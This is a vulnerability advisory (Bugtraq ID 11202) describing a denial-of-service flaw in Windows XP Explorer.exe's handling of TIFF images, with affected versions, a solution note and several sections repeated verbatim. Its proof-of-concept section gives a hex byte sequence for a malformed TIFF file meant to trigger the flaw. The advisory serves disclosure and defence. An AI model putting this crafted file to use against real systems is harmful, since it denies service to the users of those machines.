Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability
BID:11202
Info
Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability
| Bugtraq ID: | 11202 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 16 2004 12:00AM |
| Updated: | Sep 16 2004 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Jason Summers <[email protected]>. |
| Vulnerable: |
Microsoft Windows XP Professional SP1 Microsoft Windows XP Professional Microsoft Windows XP Home SP1 Microsoft Windows XP Home |
| Not Vulnerable: |
Microsoft Windows XP Professional SP2 Microsoft Windows XP Home SP2 |
Discussion
Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability
Explorer.exe that ships with Microsoft Windows XP prior to Windows XP SP2 is reported prone to a denial of service vulnerability.
The vulnerability is reported to exist when Explorer.exe handles certain TIFF format images.
A remote attacker may exploit this vulnerability by presenting a malicious image to a victim user. When this image is processed in a sufficient manner, system resources will be consumed. This will impact the performance of the computer, effectively denying service to legitimate users.
Explorer.exe that ships with Microsoft Windows XP prior to Windows XP SP2 is reported prone to a denial of service vulnerability.
The vulnerability is reported to exist when Explorer.exe handles certain TIFF format images.
A remote attacker may exploit this vulnerability by presenting a malicious image to a victim user. When this image is processed in a sufficient manner, system resources will be consumed. This will impact the performance of the computer, effectively denying service to legitimate users.
Exploit / POC
Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability
The following example TIFF image is available:
49 49 2a 00 08 00 00 00 01 00 00 01 03 00 01 00
00 00 01 00 00 00 08 00 00 00
This should be placed in a file and given a '.tif' extension.
The following example TIFF image is available:
49 49 2a 00 08 00 00 00 01 00 00 01 03 00 01 00
00 00 01 00 00 00 08 00 00 00
This should be placed in a file and given a '.tif' extension.
Solution / Fix
Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability
Solution:
It is reported that this vulnerability was addressed in Microsoft Windows XP Service Pack 2. This is not confirmed.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
It is reported that this vulnerability was addressed in Microsoft Windows XP Service Pack 2. This is not confirmed.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability
References:
References:
- Technet Security (Microsoft)